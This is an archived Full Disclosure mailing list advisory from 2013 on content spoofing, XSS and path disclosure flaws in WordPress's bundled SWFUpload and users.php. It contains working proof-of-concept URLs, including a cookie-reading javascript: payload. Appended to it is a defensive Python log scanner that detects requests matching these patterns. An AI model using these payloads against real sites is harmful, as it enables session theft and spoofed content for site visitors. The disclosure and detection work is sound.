Full Disclosure mailing list archives

CS, XSS and FPD vulnerabilities in WordPress


From: "MustLive" <mustlive () websecurity com ua>
Date: Tue, 9 Jul 2013 23:51:22 +0300

Hello list!

These are Content Spoofing, Cross-Site Scripting and Full path disclosure
vulnerabilities in WordPress.

In the WordPress 3.5.2 release (the same as in the 3.5.1 release), the WP
developers mentioned multiple fixed holes, but not all of them - to make it
look like there were fewer fixed holes. So I'm revealing this information for you.

In March I wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which
is also bundled with WordPress), and I mentioned that they concerned only
versions before WordPress 3.3.2 and were fixed in version 3.3.2 together
with the 2012 XSS hole. But I checked these holes in older versions of WP and
in version 3.5.1.

And as I found two weeks ago, these CS and XSS vulnerabilities were fixed
exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable,
and in version 3.5.1 the developers included an updated version of SWFUpload
without mentioning these fixes (they like to do such things); they only
mentioned the fixes in SWFUpload in WP 3.5.2.

There are fixed vulnerabilities in WordPress 3.5.2 which are not mentioned
in the announcement and codex, like the below-mentioned Full path disclosure
vulnerability (which I disclosed last week), even though they have mentioned
FPD during upload.

-------------------------
Affected products:
-------------------------

Versions WordPress 2.7 - 3.5 are vulnerable to CS and XSS.

Versions WordPress 3.4 - 3.5.1 are vulnerable to FPD.

----------
Details:
----------

Content Spoofing (WASC-12):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

The code will execute after a click. It's strictly social XSS.

Full path disclosure (WASC-13):

http://site/wp-admin/users.php?s=http://

There is an FPD when the search string starts with http:// or https://.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
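Added here as an example (not from MustLive's post or from WordPress): a small Python log scanner that flags the two request patterns described above in Common Log Format web server access logs, so an administrator can check whether these URLs have been requested against their site. The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post): two
# requests matching the patterns in the advisory, plus two benign ones.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jul/2013:23:51:22 +0300] "GET /wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E HTTP/1.1" 200 1234
203.0.113.5 - - [09/Jul/2013:23:52:01 +0300] "GET /wp-admin/users.php?s=http:// HTTP/1.1" 200 5678
198.51.100.7 - - [09/Jul/2013:23:53:10 +0300] "GET /wp-includes/js/swfupload/swfupload.swf HTTP/1.1" 200 1234
198.51.100.7 - - [09/Jul/2013:23:54:00 +0300] "GET /wp-admin/users.php?s=alice HTTP/1.1" 200 5678
"""

# The quoted request line of a Common Log Format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return a finding label for one request target, or None if benign.

    SWFUPLOAD_BUTTONTEXT_MARKUP: swfupload.swf requested with a buttonText
      value that URL-decodes to something containing '<' (the content
      spoofing / XSS vector described in the post).
    USERS_SEARCH_URL_PREFIX: wp-admin/users.php search term beginning with
      http:// or https:// (the full path disclosure trigger).
    """
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # values are decoded
    if parts.path.endswith("/wp-includes/js/swfupload/swfupload.swf"):
        if any("<" in v for v in query.get("buttonText", [])):
            return "SWFUPLOAD_BUTTONTEXT_MARKUP"
    if parts.path.endswith("/wp-admin/users.php"):
        if any(v.lower().startswith(("http://", "https://")) for v in query.get("s", [])):
            return "USERS_SEARCH_URL_PREFIX"
    return None

def scan_log(text):
    """Return a list of (client_ip, label, target) for every matching line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            findings.append((line.split(" ", 1)[0], label, m.group("target")))
    return findings

if __name__ == "__main__":
    for ip, label, target in scan_log(SAMPLE_LOG):
        print(ip, label, target)
```

Requests to the SWF with a plain buttonText (no markup) and ordinary user searches are ignored, so the output lists only the two requests worth reviewing.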
